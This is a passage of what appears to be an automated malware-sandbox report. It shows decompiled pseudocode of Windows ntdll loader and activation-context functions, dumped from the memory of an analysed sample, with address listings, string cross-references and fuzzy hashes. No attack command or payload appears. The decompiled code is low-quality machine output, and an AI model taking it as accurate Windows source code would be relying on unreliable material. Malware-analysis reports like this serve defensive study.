					goto L49;
				}
				if((_t241 & 0x00000007) == 0) {
					if(_t209 != 0) {
						L5:
						if( *_t209 < 0x24) {
							goto L49;
						}
						L6:
						if((_t241 & 0x00000002) != 0) {
							if(_t209 + 0x2c <=  *_t209 + _t209) {
								goto L7;
							}
							_push(0xc000000d);
							_push("RtlpFindActivationContextSection_CheckParameters");
							_push("SXS: %s() flags contains return_flags but they don\'t fit in size, return invalid_parameter 0x%08lx.\n");
							L48:
							_push(0);
							_push(0x33);
							L33D7EF10();
							_t258 = _t258 + 0x14;
							goto L49;
						}
						L7:
						if((_t241 & 0x00000004) != 0) {
							if(_t209 + 0x40 <=  *_t209 + _t209) {
								goto L8;
							}
							_push(0xc000000d);
							_push("RtlpFindActivationContextSection_CheckParameters");
							_push("SXS: %s() flags contains return_assembly_metadata but they don\'t fit in size, return invalid_parameter 0x%08lx.\n");
							goto L48;
						}
						L8:
						_t241 =  &_v76;
						_v48 = _a12;
						_v60 = 0x18;
						_v56 = 0;
						_v52 = _t252;
						_v40 = 0;
						_v64 = 0;
						_v44 = 0;
						if(E33D0D580( &_v60,  &_v76,  &_v88,  &_v64) < 0) {
							goto L24;
						}
						_t151 = 0;
						if(0 < 0) {
							goto L24;
						}
						_t158 = _v88;
						if(_t158 < 0x28) {
							L34:
							_t254 = _v76;
							L91:
							_push(_t158);
							L33D7EF10(0x33, 0, "RtlFindActivationContextSectionGuid() found section at %p (length %lu) which is not a GUID section\n", _t254);
							_t258 = _t258 + 0x14;
							_t151 = 0xc0150003;
							goto L24;
						}
						_t247 = _v64;
						while(1) {
							L12:
							_t254 = _v76;
							if( *_t254 != 0x64487347) {
								goto L91;
							}
							_t211 =  *((intOrPtr*)(_t254 + 0x14));
							_t160 = 1;
							if(_t211 == 0) {
								L19:
								_t225 =  *[fs:0x18];
								_t255 = _v44;
								_v92 = 0;
								_t247 = 0;
								_v68 = _t225;
								_t241 =  *(_t225 + 0x30);
								_v72 = _t241;
								L20:
								while(1) {
									if(_t255 <= 2) {
										_t163 = _t255;
										if(_t163 == 0) {
											_t164 =  *((intOrPtr*)(_t225 + 0x1a8));
											if(_t164 == 0) {
												L43:
												_t213 =  *((intOrPtr*)(_t241 + 0x1f8));
												_v92 = 0;
												if(_t213 == 0) {
													L28:
													_t213 =  *((intOrPtr*)(_t241 + 0x200));
													_v92 = 0xfffffffc;
													if(_t213 == 0) {
														goto L21;
													}
													_t255 = 3;
													_v44 = 3;
													L22:
													if(_t213 != 0) {
														_t241 = _v52;
														_t151 = L33D0A600(_t213, _v52, _v48,  &_v76,  &_v88);
														if(_t151 < 0) {
															if(_t151 != 0xc0150001 || _t255 == 3) {
																L32:
																if(_t151 < 0) {
																	if(_t151 != 0xc0150001) {
																		goto L24;
																	}
																	goto L23;
																}
																_t158 = _v88;
																if(_t158 >= 0x28) {
																	goto L12;
																}
																goto L34;
															} else {
																_t225 = _v68;
																_t241 = _v72;
																continue;
															}
														}
														_t241 = _v92;
														_v40 = (0 | _t241 != 0xfffffffc) - 0x00000001 & 0x00000002 | 0 | _t241 == 0x00000000;
														asm("sbb edi, edi");
														_t247 =  ~(_t241 - 0xfffffffc) & _t241;
														_t151 = 0;
														goto L32;
													}
													L23:
													_t151 = 0xc0150008;
													goto L24;
												}
												_t255 = 2;
												_v44 = 2;
												goto L22;
											}
											_t170 =  *_t164;
											if(_t170 == 0) {
												goto L43;
											}
											_t171 =  *((intOrPtr*)(_t170 + 4));
											_v92 = _t171;
											if(_t171 == 0) {
												L83:
												if(_t213 == 0) {
													goto L43;
												}
												L84:
												_t255 = 1;
												_v44 = 1;
												goto L22;
											}
											if(_t171 != 0xfffffffc) {
												if(_t171 != 0xfffffffd) {
													_t213 =  *((intOrPtr*)(_t171 + 0x10));
													goto L83;
												}
												_t213 = "Actx ";
												goto L84;
											}
											_t213 =  *((intOrPtr*)(_t241 + 0x200));
											goto L83;
										}
										_t172 = _t163 - 1;
										if(_t172 == 0) {
											goto L43;
										}
										if(_t172 != 1) {
											goto L21;
										}
										goto L28;
									}
									L21:
									if(_t255 > 3) {
										_t151 = 0xc00000e5;
										goto L24;
									}
									goto L22;
								}
							}
							if( *((intOrPtr*)(_t254 + 8)) != 1) {
								_t160 = 0;
							}
							_t227 =  *((intOrPtr*)(_t254 + 0x1c));
							if(_t227 != 0) {
								if(_t160 == 0) {
									goto L16;
								}
								_v92 = 0;
								_t233 =  *((intOrPtr*)(_t227 + _t254 + 4)) +  *_v84 %  *(_t227 + _t254) * 8;
								_t234 = _t233 + _t254;
								_t201 =  *((intOrPtr*)(_t233 + _t254 + 4)) + _t254;
								_v72 = _t234;
								if( *_t234 <= 0) {
									goto L19;
								} else {
									goto L54;
								}
								while(1) {
									L54:
									_t214 =  *_t201 + _t254;
									_v68 = _t201 + 4;
									if(E33D48050(_t214, _v84, 0x10) == 0x10) {
										goto L18;
									}
									_t205 = _v92 + 1;
									_v92 = _t205;
									_t201 = _v68;
									if(_t205 <  *_v72) {
										continue;
									}
									goto L19;
								}
							} else {
								L16:
								_t228 =  *((intOrPtr*)(_t254 + 0x18));
								if(( *(_t254 + 0x10) & 0x00000001) == 0) {
									_t174 = _t228 + _t254;
									_v92 = _t228 + _t254;
									while(E33D48050(_t174, _v84, 0x10) != 0x10) {
										_t174 = _v92 + 0x1c;
										_v92 = _v92 + 0x1c;
										_t211 = _t211 - 1;
										if(_t211 != 0) {
											continue;
										}
										goto L19;
									}
									_t214 = _v92;
									L18:
									if(_t214 != 0) {
										if( *((intOrPtr*)(_t214 + 0x10)) == 0) {
											goto L19;
										}
										_t241 = _v80;
										if(_t241 != 0) {
											 *((intOrPtr*)(_t241 + 4)) =  *((intOrPtr*)(_t254 + 0xc));
											 *((intOrPtr*)(_t241 + 8)) =  *((intOrPtr*)(_t214 + 0x10)) + _t254;
											 *((intOrPtr*)(_t241 + 0xc)) =  *((intOrPtr*)(_t214 + 0x14));
											if(_t241 + 0x28 <=  *_t241 + _t241) {
												 *((intOrPtr*)(_t241 + 0x24)) =  *((intOrPtr*)(_t214 + 0x18));
											}
										}
										if((_t247 - 0x00000001 | 0x00000007) != 0xffffffff) {
											_t215 =  *((intOrPtr*)(_t247 + 0x14));
											if(_t215 != 0 && (( *(_t247 + 0x1c) & 0x00000008) == 0 || ( *(_t247 + 0x3c) & 0x00000008) == 0)) {
												_v93 = 0;
												 *0x33de91e0(3, _t247,  *((intOrPtr*)(_t247 + 0x10)),  *((intOrPtr*)(_t247 + 0x18)), 0,  &_v93);
												 *_t215();
												 *(_t247 + 0x1c) =  *(_t247 + 0x1c) | 0x00000008;
												_t241 = _v104;
												if(_v117 != 0) {
													 *(_t247 + 0x3c) =  *(_t247 + 0x3c) | 0x00000008;
												}
											}
										}
										if(_t241 == 0 || L33CF4428(_a4, _t241, _t247,  &_v60, _t254,  *((intOrPtr*)(_t254 + 0x20)),  *((intOrPtr*)(_t254 + 0x24)), _v88) >= 0) {
											_t151 = 0;
										}
										goto L24;
									}
									goto L19;
								}
								_t242 = _v84;
								_v36 =  *_t242;
								_v32 =  *((intOrPtr*)(_t242 + 4));
								_v28 =  *((intOrPtr*)(_t242 + 8));
								_v24 =  *((intOrPtr*)(_t242 + 0xc));
								_t195 = E33D38170( &_v36, _t228 + _t254, _t211, 0x1c, E33CEB600);
								_t258 = _t258 + 0x14;
								_t214 = _t195;
							}
							goto L18;
						}
						goto L91;
					}
					goto L6;
				}
				if(_t209 == 0) {
					goto L49;
				}
				goto L5;
			}




























































                                                                                                                                                                                            0x33d0d698
                                                                                                                                                                                            0x33d0d6a2
                                                                                                                                                                                            0x33d0d6a6
                                                                                                                                                                                            0x33d0d6ad
                                                                                                                                                                                            0x33d0d6b1
                                                                                                                                                                                            0x33d0d6b4
                                                                                                                                                                                            0x33d0d6b8
                                                                                                                                                                                            0x33d0d6c3
                                                                                                                                                                                            0x33d0d6c7
                                                                                                                                                                                            0x33d0d6cb
                                                                                                                                                                                            0x33d0d90e
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x33d5913f
                                                                                                                                                                                            0x33d5913f
                                                                                                                                                                                            0x33d0d847
                                                                                                                                                                                            0x33d0d84b
                                                                                                                                                                                            0x33d0d84c
                                                                                                                                                                                            0x33d0d84d
                                                                                                                                                                                            0x33d0d858
                                                                                                                                                                                            0x33d0d858
                                                                                                                                                                                            0x33d0d90e
                                                                                                                                                                                            0x33d0d6d1
                                                                                                                                                                                            0x33d0d6d1
                                                                                                                                                                                            0x33d0d6db
                                                                                                                                                                                            0x33d59164
                                                                                                                                                                                            0x33d59164
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x33d59164
                                                                                                                                                                                            0x33d0d6e1
                                                                                                                                                                                            0x33d0d6ea
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x33d0d6f3
                                                                                                                                                                                            0x33d0d8fc
                                                                                                                                                                                            0x33d0d701
                                                                                                                                                                                            0x33d0d704
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x33d0d70a
                                                                                                                                                                                            0x33d0d70d
                                                                                                                                                                                            0x33d0d922
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x33d59149
                                                                                                                                                                                            0x33d5914e
                                                                                                                                                                                            0x33d59153
                                                                                                                                                                                            0x33d59158
                                                                                                                                                                                            0x33d59158
                                                                                                                                                                                            0x33d5915a
                                                                                                                                                                                            0x33d5915c
                                                                                                                                                                                            0x33d59161
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x33d59161
                                                                                                                                                                                            0x33d0d713
                                                                                                                                                                                            0x33d0d716
                                                                                                                                                                                            0x33d0d936
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x33d5916e
                                                                                                                                                                                            0x33d59173
                                                                                                                                                                                            0x33d59178
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x33d59178
                                                                                                                                                                                            0x33d0d71c
                                                                                                                                                                                            0x33d0d71f
                                                                                                                                                                                            0x33d0d723
                                                                                                                                                                                            0x33d0d72f
                                                                                                                                                                                            0x33d0d73c
                                                                                                                                                                                            0x33d0d745
                                                                                                                                                                                            0x33d0d749
                                                                                                                                                                                            0x33d0d751
                                                                                                                                                                                            0x33d0d759
                                                                                                                                                                                            0x33d0d768
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x33d0d76e
                                                                                                                                                                                            0x33d0d772
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x33d0d778
                                                                                                                                                                                            0x33d0d77f
                                                                                                                                                                                            0x33d0d8f1
                                                                                                                                                                                            0x33d0d8f1
                                                                                                                                                                                            0x33d59370
                                                                                                                                                                                            0x33d59370
                                                                                                                                                                                            0x33d5937b
                                                                                                                                                                                            0x33d59380
                                                                                                                                                                                            0x33d59383
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x33d59383
                                                                                                                                                                                            0x33d0d785
                                                                                                                                                                                            0x33d0d790
                                                                                                                                                                                            0x33d0d790
                                                                                                                                                                                            0x33d0d790
                                                                                                                                                                                            0x33d0d79a
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x33d0d7a0
                                                                                                                                                                                            0x33d0d7a3
                                                                                                                                                                                            0x33d0d7a7
                                                                                                                                                                                            0x33d0d80d
                                                                                                                                                                                            0x33d0d80d
                                                                                                                                                                                            0x33d0d816
                                                                                                                                                                                            0x33d0d81c
                                                                                                                                                                                            0x33d0d820
                                                                                                                                                                                            0x33d0d822
                                                                                                                                                                                            0x33d0d826
                                                                                                                                                                                            0x33d0d829
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x33d0d830
                                                                                                                                                                                            0x33d0d833
                                                                                                                                                                                            0x33d0d85d
                                                                                                                                                                                            0x33d0d860
                                                                                                                                                                                            0x33d592e0
                                                                                                                                                                                            0x33d592e8
                                                                                                                                                                                            0x33d0d941
                                                                                                                                                                                            0x33d0d941
                                                                                                                                                                                            0x33d0d949
                                                                                                                                                                                            0x33d0d94f
                                                                                                                                                                                            0x33d0d874
                                                                                                                                                                                            0x33d0d874
                                                                                                                                                                                            0x33d0d87a
                                                                                                                                                                                            0x33d0d884
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x33d0d886
                                                                                                                                                                                            0x33d0d88b
                                                                                                                                                                                            0x33d0d83e
                                                                                                                                                                                            0x33d0d840
                                                                                                                                                                                            0x33d0d891
                                                                                                                                                                                            0x33d0d8a5
                                                                                                                                                                                            0x33d0d8ac
                                                                                                                                                                                            0x33d5933a
                                                                                                                                                                                            0x33d0d8dc
                                                                                                                                                                                            0x33d0d8de
                                                                                                                                                                                            0x33d5935b
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x33d59361
                                                                                                                                                                                            0x33d0d8e4
                                                                                                                                                                                            0x33d0d8eb
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x33d59349
                                                                                                                                                                                            0x33d59349
                                                                                                                                                                                            0x33d5934d
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x33d5934d
                                                                                                                                                                                            0x33d5933a
                                                                                                                                                                                            0x33d0d8b2
                                                                                                                                                                                            0x33d0d8d2
                                                                                                                                                                                            0x33d0d8d6
                                                                                                                                                                                            0x33d0d8d8
                                                                                                                                                                                            0x33d0d8da
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x33d0d8da
                                                                                                                                                                                            0x33d0d842
                                                                                                                                                                                            0x33d0d842
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x33d0d842
                                                                                                                                                                                            0x33d0d955
                                                                                                                                                                                            0x33d0d95a
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x33d0d95a
                                                                                                                                                                                            0x33d592ee
                                                                                                                                                                                            0x33d592f2
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x33d592f8
                                                                                                                                                                                            0x33d592fb
                                                                                                                                                                                            0x33d59301
                                                                                                                                                                                            0x33d5931f
                                                                                                                                                                                            0x33d59321
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x33d59327
                                                                                                                                                                                            0x33d59327
                                                                                                                                                                                            0x33d5932c
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x33d5932c
                                                                                                                                                                                            0x33d59306
                                                                                                                                                                                            0x33d59313
                                                                                                                                                                                            0x33d5931c
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x33d5931c
                                                                                                                                                                                            0x33d59315
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x33d59315
                                                                                                                                                                                            0x33d59308
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x33d59308
                                                                                                                                                                                            0x33d0d866
                                                                                                                                                                                            0x33d0d869
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x33d0d872
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x33d0d872
                                                                                                                                                                                            0x33d0d835
                                                                                                                                                                                            0x33d0d838
                                                                                                                                                                                            0x33d59366
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x33d59366
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x33d0d838
                                                                                                                                                                                            0x33d0d830
                                                                                                                                                                                            0x33d0d7ad
                                                                                                                                                                                            0x33d5917f
                                                                                                                                                                                            0x33d5917f
                                                                                                                                                                                            0x33d0d7b3
                                                                                                                                                                                            0x33d0d7b8
                                                                                                                                                                                            0x33d59188
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x33d59194
                                                                                                                                                                                            0x33d591a5
                                                                                                                                                                                            0x33d591ac
                                                                                                                                                                                            0x33d591ae
                                                                                                                                                                                            0x33d591b0
                                                                                                                                                                                            0x33d591b7
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x33d591bd
                                                                                                                                                                                            0x33d591bd
                                                                                                                                                                                            0x33d591c8
                                                                                                                                                                                            0x33d591ca
                                                                                                                                                                                            0x33d591d7
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x33d591e5
                                                                                                                                                                                            0x33d591e6
                                                                                                                                                                                            0x33d591ec
                                                                                                                                                                                            0x33d591f0
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x33d591f2
                                                                                                                                                                                            0x33d0d7be
                                                                                                                                                                                            0x33d0d7be
                                                                                                                                                                                            0x33d0d7c2
                                                                                                                                                                                            0x33d0d7c5
                                                                                                                                                                                            0x33d591f7
                                                                                                                                                                                            0x33d591fa
                                                                                                                                                                                            0x33d591fe
                                                                                                                                                                                            0x33d59213
                                                                                                                                                                                            0x33d59216
                                                                                                                                                                                            0x33d5921a
                                                                                                                                                                                            0x33d5921d
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x33d5921f
                                                                                                                                                                                            0x33d59224
                                                                                                                                                                                            0x33d0d805
                                                                                                                                                                                            0x33d0d807
                                                                                                                                                                                            0x33d59231
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x33d59237
                                                                                                                                                                                            0x33d5923d
                                                                                                                                                                                            0x33d59244
                                                                                                                                                                                            0x33d5924e
                                                                                                                                                                                            0x33d59254
                                                                                                                                                                                            0x33d5925c
                                                                                                                                                                                            0x33d59261
                                                                                                                                                                                            0x33d59261
                                                                                                                                                                                            0x33d5925c
                                                                                                                                                                                            0x33d5926d
                                                                                                                                                                                            0x33d5926f
                                                                                                                                                                                            0x33d59274
                                                                                                                                                                                            0x33d59286
                                                                                                                                                                                            0x33d59299
                                                                                                                                                                                            0x33d5929f
                                                                                                                                                                                            0x33d592a1
                                                                                                                                                                                            0x33d592aa
                                                                                                                                                                                            0x33d592ae
                                                                                                                                                                                            0x33d592b0
                                                                                                                                                                                            0x33d592b0
                                                                                                                                                                                            0x33d592ae
                                                                                                                                                                                            0x33d59274
                                                                                                                                                                                            0x33d592b6
                                                                                                                                                                                            0x33d592d9
                                                                                                                                                                                            0x33d592d9
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x33d592b6
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x33d0d807
                                                                                                                                                                                            0x33d0d7cb
                                                                                                                                                                                            0x33d0d7d9
                                                                                                                                                                                            0x33d0d7e0
                                                                                                                                                                                            0x33d0d7e7
                                                                                                                                                                                            0x33d0d7ee
                                                                                                                                                                                            0x33d0d7fb
                                                                                                                                                                                            0x33d0d800
                                                                                                                                                                                            0x33d0d803
                                                                                                                                                                                            0x33d0d803
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x33d0d7b8
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x33d0d790
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x33d0d902
                                                                                                                                                                                            0x33d0d6fb
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x00000000

                                                                                                                                                                                            APIs
                                                                                                                                                                                            Strings
                                                                                                                                                                                            • Actx , xrefs: 33D59315
                                                                                                                                                                                            • SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 33D59178
                                                                                                                                                                                            • RtlFindActivationContextSectionGuid() found section at %p (length %lu) which is not a GUID section, xrefs: 33D59372
                                                                                                                                                                                            • GsHd, xrefs: 33D0D794
                                                                                                                                                                                            • SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 33D59153
                                                                                                                                                                                            • RtlpFindActivationContextSection_CheckParameters, xrefs: 33D5914E, 33D59173
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000002.00000002.3795336805.0000000033CC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 33CC0000, based on PE: true
                                                                                                                                                                                            • Associated: 00000002.00000002.3795336805.0000000033DE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.3795336805.0000000033DED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_33cc0000_fjerbregners_patrol.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: DebugPrintTimes
                                                                                                                                                                                            • String ID: Actx $GsHd$RtlFindActivationContextSectionGuid() found section at %p (length %lu) which is not a GUID section$RtlpFindActivationContextSection_CheckParameters$SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx.$SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx.
                                                                                                                                                                                            • API String ID: 3446177414-2196497285
                                                                                                                                                                                            • Opcode ID: 1e72b8183503955646c1bfbe6a3061310ac169096ccebafea41271df996be301
                                                                                                                                                                                            • Instruction ID: c284769c152fcd1271ec1b9dba6bd5c5574d84ce2b043a816430d29d5db24511
                                                                                                                                                                                            • Opcode Fuzzy Hash: 1e72b8183503955646c1bfbe6a3061310ac169096ccebafea41271df996be301
                                                                                                                                                                                            • Instruction Fuzzy Hash: F1E18174A043418FEB10CF14C8C0B5AB7E5BF88B54F484A6EF8968B295D771E949CF92
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 33D6FA02 Relevance: 12.4, APIs: 2, Strings: 5, Instructions: 109timeCOMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            C-Code - Quality: 17%
                                                                                                                                                                                            			E33D6FA02(intOrPtr __ecx, void* __edx, void* __eflags, intOrPtr _a4, intOrPtr* _a8, intOrPtr* _a12, intOrPtr _a16, intOrPtr _a20) {
				char* _v8;
				intOrPtr _v12;
				char* _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				char* _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				char _v56;
				signed char _t50;
				intOrPtr _t51;
				intOrPtr _t66;
				intOrPtr _t68;
				char* _t71;
				void* _t74;
				intOrPtr* _t75;
				intOrPtr* _t76;
				char* _t77;

				_t74 = __edx;
				_v20 = __ecx;
				_t66 = 0;
				_v12 =  *((intOrPtr*)(__ecx + 0x18)) +  *((intOrPtr*)(_a4 + 4));
				E33D6F899(__ecx, _a4, _a16,  &_v16,  &_v8);
				_t50 =  *0x33de37c0; // 0x0
				_t77 = _v16;
				if((_t50 & 0x00000003) != 0) {
					_t71 = _t77;
					if(_t77 == 0) {
						_t71 = "Unknown";
					}
					_push(_a20);
					_push(_v20 + 0x2c);
					_push(_v8);
					_push(_t71);
					E33D6E692("minkernel\\ntdll\\ldrdload.c", 0x1cc, "LdrpRedirectDelayloadFailure", _t66, "Failed to find export %s!%s (Ordinal:%d) in \"%wZ\"  0x%08lx\n", _v12);
					_t50 =  *0x33de37c0; // 0x0
				}
				if((_t50 & 0x00000010) != 0) {
					asm("int3");
				}
				if(_t74 == 0) {
					_t68 = _t66;
					goto L11;
				} else {
					_t68 =  *((intOrPtr*)(_t74 + 0x18));
					if(( *0x33de391c & 0x00000010) != 0 || ( *(_t74 + 0x34) & 0x00000001) != 0) {
						L11:
						_t51 = 1;
						goto L12;
					} else {
						_t51 = _t66;
						L12:
						_t75 = _a8;
						if(_t75 == 0 || _t51 == 0) {
							L18:
							_t76 = _a12;
							if(_t76 != 0) {
								if(_t77 == 0) {
									_t77 = _v8;
								}
								 *0x33de91e0(_v12, _t77);
								_t66 =  *_t76();
							}
							goto L22;
						} else {
							_v52 = _a4;
							_v48 = _a16;
							_v28 = _t66;
							_v56 = 0x24;
							_v44 = _v12;
							_v32 = _t68;
							_v24 = E33D26010(_a20);
							if(_t77 == 0) {
								_v40 = _t66;
								_v36 = _v8;
							} else {
								_v40 = 1;
								_v36 = _t77;
							}
							 *0x33de91e0(4,  &_v56);
							_t66 =  *_t75();
							if(_t66 != 0) {
								L22:
								return _t66;
							} else {
								goto L18;
							}
						}
					}
				}
			}

























                                                                                                                                                                                            0x33d6fa10
                                                                                                                                                                                            0x33d6fa12
                                                                                                                                                                                            0x33d6fa18
                                                                                                                                                                                            0x33d6fa1d
                                                                                                                                                                                            0x33d6fa2b
                                                                                                                                                                                            0x33d6fa30
                                                                                                                                                                                            0x33d6fa35
                                                                                                                                                                                            0x33d6fa3a
                                                                                                                                                                                            0x33d6fa3c
                                                                                                                                                                                            0x33d6fa40
                                                                                                                                                                                            0x33d6fa42
                                                                                                                                                                                            0x33d6fa42
                                                                                                                                                                                            0x33d6fa47
                                                                                                                                                                                            0x33d6fa50
                                                                                                                                                                                            0x33d6fa51
                                                                                                                                                                                            0x33d6fa54
                                                                                                                                                                                            0x33d6fa6d
                                                                                                                                                                                            0x33d6fa72
                                                                                                                                                                                            0x33d6fa77
                                                                                                                                                                                            0x33d6fa7c
                                                                                                                                                                                            0x33d6fa7e
                                                                                                                                                                                            0x33d6fa7e
                                                                                                                                                                                            0x33d6fa81
                                                                                                                                                                                            0x33d6fa99
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x33d6fa83
                                                                                                                                                                                            0x33d6fa8a
                                                                                                                                                                                            0x33d6fa8d
                                                                                                                                                                                            0x33d6fa9b
                                                                                                                                                                                            0x33d6fa9b
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x33d6fa95
                                                                                                                                                                                            0x33d6fa95
                                                                                                                                                                                            0x33d6fa9d
                                                                                                                                                                                            0x33d6fa9d
                                                                                                                                                                                            0x33d6faa2
                                                                                                                                                                                            0x33d6fb01
                                                                                                                                                                                            0x33d6fb01
                                                                                                                                                                                            0x33d6fb06
                                                                                                                                                                                            0x33d6fb0a
                                                                                                                                                                                            0x33d6fb0c
                                                                                                                                                                                            0x33d6fb0c
                                                                                                                                                                                            0x33d6fb15
                                                                                                                                                                                            0x33d6fb1d
                                                                                                                                                                                            0x33d6fb1d
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x33d6faa8
                                                                                                                                                                                            0x33d6faae
                                                                                                                                                                                            0x33d6fab4
                                                                                                                                                                                            0x33d6faba
                                                                                                                                                                                            0x33d6fabd
                                                                                                                                                                                            0x33d6fac4
                                                                                                                                                                                            0x33d6fac7
                                                                                                                                                                                            0x33d6facf
                                                                                                                                                                                            0x33d6fad4
                                                                                                                                                                                            0x33d6fae5
                                                                                                                                                                                            0x33d6fae8
                                                                                                                                                                                            0x33d6fad6
                                                                                                                                                                                            0x33d6fad6
                                                                                                                                                                                            0x33d6fadd
                                                                                                                                                                                            0x33d6fadd
                                                                                                                                                                                            0x33d6faf3
                                                                                                                                                                                            0x33d6fafb
                                                                                                                                                                                            0x33d6faff
                                                                                                                                                                                            0x33d6fb21
                                                                                                                                                                                            0x33d6fb25
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x33d6faff
                                                                                                                                                                                            0x33d6faa2
                                                                                                                                                                                            0x33d6fa8d

                                                                                                                                                                                            APIs
                                                                                                                                                                                            Strings
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000002.00000002.3795336805.0000000033CC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 33CC0000, based on PE: true
                                                                                                                                                                                            • Associated: 00000002.00000002.3795336805.0000000033DE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.3795336805.0000000033DED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_33cc0000_fjerbregners_patrol.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: DebugPrintTimes
                                                                                                                                                                                            • String ID: $$Failed to find export %s!%s (Ordinal:%d) in "%wZ" 0x%08lx$LdrpRedirectDelayloadFailure$Unknown$minkernel\ntdll\ldrdload.c
                                                                                                                                                                                            • API String ID: 3446177414-4227709934
                                                                                                                                                                                            • Opcode ID: be2173bb78aa48903236745b8f8c351e0fb02f914772a1258242207f2ea9a0a7
                                                                                                                                                                                            • Instruction ID: 4e6eb79fe3a1e8fbc92934ff356e5a97d8ffeae1d2320e8b993eac6e7602c9f0
                                                                                                                                                                                            • Opcode Fuzzy Hash: be2173bb78aa48903236745b8f8c351e0fb02f914772a1258242207f2ea9a0a7
                                                                                                                                                                                            • Instruction Fuzzy Hash: CC419FB9A01609AFDB01DF98C980ADEBBF9FF48B58F540259E951BB300D7719D01DB90
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 33CF9046 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 199timeCOMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            C-Code - Quality: 67%
